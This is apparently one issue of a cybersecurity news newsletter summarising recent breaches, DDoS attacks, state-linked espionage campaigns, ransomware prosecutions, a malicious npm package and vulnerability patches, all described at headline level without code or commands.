🇫🇷 France’s national agency for identity documents (ANTS) says it suffered a data breach last week that may have exposed personal details like names, emails, birth dates and addresses. A hacker called "breach3d" claims to be selling up to 19 million records, though the data has not been widely leaked. ANTS notified authorities, says no action is needed now, and warns people to watch for phishing.

💄 Cosmetics company Rituals confirmed hackers stole customer membership data from its database. The breach exposed names, birth dates, contact details, store preferences, and account types for customers in Europe, the UK, and some in the U.S.. The company is investigating but has not disclosed how many members were affected or details of the attack.

🇺🇸 Three U.S. healthcare organizations in Illinois and Texas reported data breaches affecting about 600,000 people — The largest was North Texas Behavioral Health Authority (285,000), followed by Southern Illinois Dermatology (160,000) and Saint Anthony Hospital (146,000). Stolen data included personal and health information, with intrusions traced to network hacks, ransomware actors, and compromised employee email accounts.

🗾 🇺🇸 Seiko USA's website was defaced with a message claiming attackers stole its Shopify customer database. The hackers demanded ransom and threatened to publish names, contact details, orders, and shipping addresses. Seiko has not confirmed the breach and removed the extortion message.

🦋 Bluesky suffered a sophisticated DDoS attack starting April 15 that caused intermittent outages for feeds, notifications, threads, and search. The company said no private user data was accessed and it mitigated the attack after about a day. A group called 313 Team claimed responsibility, but that attribution has not been independently verified.

→ Mastodon says its flagship server was hit by a DDoS attack

🇺🇸 Vercel says attackers gained unauthorized access to some internal systems and a limited number of customers may be affected. A threat actor claiming to be ShinyHunters is trying to sell stolen keys, source code, and employee records, and posted screenshots as proof. Vercel is investigating, working with incident responders and law enforcement, and telling customers to rotate secrets and review sensitive environment variables.

→ Vercel Traces Customer Data Theft to Agentic AI Tool Breach

→ Vercel Finds More Compromised Accounts in Context.ai-Linked Breach

🇨🇳 👀 🇺🇸 A China-linked espionage campaign used zero-day flaws to install a persistent backdoor called Firestarter on Cisco firewalls. CISA says at least one US federal agency was infected and that firmware patches do not remove the malware. Agencies must upload core dumps for checks, patch, and hard-reset affected devices by the April 2026 deadlines.

🇨🇳 🇲🇳 A China-aligned APT called GopherWhisper infected about 12 Mongolian government systems with multiple Go- and C++‑based backdoors. The group used Discord, Slack, Outlook, and file[.]io for command-and-control and data exfiltration. ESET found activity timed to China Standard Time, suggesting the actor’s alignment.

❌ Spanish police shut down a major Spanish-language manga piracy site that ran since 2014 and served millions of users. They arrested four people and seized a complex server setup plus crypto wallets holding about $470,000. Authorities say the site made over $4.7 million from ads, harmed rights holders, and exposed minors to pornographic pop-ups.

🇺🇸 ⚖ Angelo Martino, a former ransomware negotiator, pleaded guilty to helping the ALPHV/BlackCat gang extort companies. He secretly gave criminals victims’ confidential info and shared in ransom profits. He faces up to 20 years in prison and authorities seized $10 million.

🇺🇸 ⚖ 🇬🇧 Tyler Robert Buchanan, a 24-year-old British member of the Scattered Spider hacking group, pleaded guilty to wire fraud conspiracy and aggravated identity theft. He admitted running mass SMS phishing and SIM-swap attacks in 2022 that helped steal millions in cryptocurrency and breach major tech firms. Buchanan is in U.S. custody, faces up to 22 years, and will be sentenced in August 2026.

🗓️ {Cyber,Info}Sec Events — A community-maintained list of infosec conferences worldwide. Subscribe to the ICS calendar feed to get events straight into your calendar, or follow @[email protected] on Mastodon for weekly digests. Contributions and ⭐ welcome!

🇨🇳 Twelve allied cyber agencies warned that China-linked hackers are building large covert networks from everyday routers and IoT devices. These networks let attackers hide their origin and carry out espionage, malware delivery, and infrastructure pre-positioning. Agencies urge stronger cybersecurity, active hunting, and sharing threat data to block and map these networks.

🇺🇸 👆 🗑 Sean Plankey asked President Trump to withdraw his nomination to lead CISA after a year without Senate confirmation. His renomination faced holds from several senators and was widely seen as stalled. The agency remains led by acting directors amid turnover and proposed budget cuts.

👀 📲 The U.K. says about 100 countries now have commercial spyware that can hack phones and computers. This tech is easier to get and has been used not just on criminals but also on journalists, bankers, and critics. Leaks and cybercriminals mean the tools can spread and threaten many more people.

🇺🇸 Reports say the NSA is using Anthropic’s restricted Mythos Preview model. Anthropic limited Mythos because it could enable offensive cyberattacks, yet gave access to about 40 organizations. The NSA reportedly uses it to scan for vulnerabilities amid a tense Pentagon-Anthropic dispute.

🔑 Attackers briefly published a malicious @bitwarden/cli npm package that stole developer credentials and could spread to other projects. The malware harvested tokens, SSH keys, and cloud credentials, then exfiltrated encrypted data to public GitHub repos. Bitwarden removed the release, revoked access, and says only users who installed that version were affected.

🐧 A new Linux GoGra backdoor uses Microsoft Graph API and Outlook mailboxes to receive commands and return results. It authenticates with hardcoded Azure AD credentials, hides as a Conky autostart, and runs ELF files disguised as PDFs. Symantec links this tool to the Harvester espionage group, showing they are expanding to Linux targets.

🍎 🛍 Security researcher Kaspersky found 26 fake crypto wallet apps on Apple’s App Store that steal recovery phrases and private keys. The FakeWallet campaign used typosquatting and phishing links to trick users, mainly targeting Chinese users but with no strict regional limits. Apple has been notified and is removing the malicious apps.

🎩 Researchers found Gentlemen ransomware affiliates using the SystemBC botnet of over 1,570 infected hosts to relay and deliver payloads. The gang’s RaaS encrypts many systems and now pairs Cobalt Strike, credential theft, and proxy infrastructure for targeted corporate attacks. Check Point warns this integration signals the group is scaling up and offers IoCs and detections for defenders.

🔙 🚪 Threat actors are abusing the QEMU emulator to hide backdoors and deliver ransomware and remote access tools. They exploit VPN and server vulnerabilities to run QEMU VMs with system privileges, create reverse SSH tunnels, and steal credentials and AD data. Organizations should hunt for unauthorized QEMU installs, rogue scheduled tasks, strange port forwarding, and outbound SSH tunnels.

🔓 Reporters say an unidentified online group accessed Anthropic’s new enterprise security tool, Mythos, via a third-party vendor. Anthropic says it is investigating and has found no sign its own systems were breached. The group shared screenshots and demonstrations after getting in.

🇰🇵 💸 Hackers stole over $290 million in cryptocurrency from Kelp DAO — LayerZero says preliminary evidence points to North Korea’s TraderTraitor group using a bridge exploit and weak approval settings. Kelp DAO disputes LayerZero’s blame.

➝ From the Patching Department:

💥 A privilege-escalation flaw in Microsoft Defender called BlueHammer (CVE-2026-33825) was publicly disclosed and patched April 14. Attackers used the published PoC to exploit the bug and other related techniques (RedSun, UnDefend) to try gaining System privileges. Huntress and CISA reported active attempts involving compromised VPN access and urged immediate patching.

🩹 🐛 Apple released iOS and iPadOS updates to fix a bug that kept deleted message previews on devices. The flaw let cached notifications (including Signal chats) be recovered with forensic tools and was reportedly used by law enforcement. Installing the new patches removes the saved previews and prevents future retention.

🦊 Anthropic’s Claude Mythos found 271 potential Firefox bugs, and Mozilla patched many issues in Firefox 150. Only three were given public CVEs, so most were lower-severity or non-exploitable findings. Security firms warn advanced AI can rapidly find and chain vulnerabilities, increasing risk if not controlled.

🦠 Dragos says the new ZionSiphon malware that supposedly targets Israeli water plants is overhyped — The code is broken, likely AI-generated, and shows little understanding of industrial control systems. Focusing on this distracts defenders from real threats like Volt Typhoon.

🐛 Researchers found serious vulnerabilities in serial-to-IP converters that let attackers run code, tamper firmware, and take over devices. These converters connect old industrial and healthcare gear to networks and thousands are exposed online. Patches are available from vendors, but unpatched devices could let hackers manipulate sensors or disrupt care and critical systems.

🛜 A Mirai botnet is exploiting a year-old command injection flaw (CVE-2025-29635) in discontinued D-Link DIR-823X routers. Attackers use crafted POST requests to run a shell script that downloads a Mirai-like payload. D-Link says these routers are end-of-life and should be retired.

→ Hackers Fail to Exploit Flaw in Discontinued TP-Link Routers

Follow me on Mastodon for quick daily updates and bite-sized content.

Prefer using an RSS feed? Add Infosec MASHUP to your feed here.

Enjoying our newsletter? Forward it to a colleague—
it’s one of the best ways to support us.

Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58

See you next time!

-X.